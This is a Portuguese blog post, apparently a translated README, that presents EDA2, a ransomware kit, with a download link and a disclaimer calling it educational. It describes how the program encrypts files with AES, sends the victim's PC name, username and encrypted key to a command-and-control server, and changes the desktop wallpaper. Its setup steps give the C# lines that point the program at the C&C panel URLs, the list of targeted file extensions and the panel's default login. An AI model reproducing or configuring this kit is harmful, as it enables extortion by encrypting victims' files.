Simples Ransomware EDA2

É um exemplo de crypter de arquivo ransomware, que pode ser modificado para propósitos específicos. É uma versão mais extensa do rasgo oculto.
Características
  • Usa os algoritmos RSA e AES.
  • Coordena com um servidor de Comando e Controle.
  • Usa CSPRNG
  • Usa phplibsec
  • Arquivos criptografados podem ser descriptografados no programa de descriptografia com chave de criptografia.
  • Muda o fundo da área de trabalho.
Vídeo de Demonstração
Fluxo de trabalho
  • O programa envia uma solicitação POST ao servidor C & C com variáveis pcname e username.
  • O servidor C & C cria um par de chaves pública / privada RSA. Envia a chave pública para o programa, salva a chave privada dentro do banco de dados Mysql
  • Programa cria uma chave aleatória para o algoritmo AES
  • Programa criptografa arquivos com o algoritmo AES
  • O programa criptografa a chave AES com chave pública RSA e a envia para o servidor C & C com solicitação POST
  • Servidor C & C salva a chave AES criptografada dentro do banco de dados Mysql
Uso
  • Você precisa ter um servidor web que execute Php e Mysql. Altere esta linha com seu URL

string generatorUrl = "http://www.example.com/panel/createkeys.php" 
; string keySaveUrl = "http://www.example.com/panel/savekey.php";
  • Ele usa 2048 como tamanho de chave RSA. Você pode mudar isso
    const int keySize = 2048;
As extensões de arquivo de destino podem ser alteradas. Lista padrão:

var validExtensions = new[]{".txt", ".doc", ".docx", ".xls",
 ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png",     ".csv", 
 ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml",
  ".psd"};
  • Edite as configurações do seu banco de dados em db.php
  • Credenciais de login padrão para o painel da web: nome de usuário: senha de teste: teste
  • Você pode usar o programa de descriptografia do Hidden Tear para descriptografar arquivos.

Aviso Legal

Embora isso possa ser útil para alguns, existem riscos significativos. O eda2 pode ser usado apenas para fins educacionais. Não o use como um ransomware! Você poderia ir para a prisão por obstrução de acusações de justiça apenas por executar o eda2, mesmo que você seja inocente.

DOWNLOAD: AQUI
às
Marcadores:

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)

Recomendado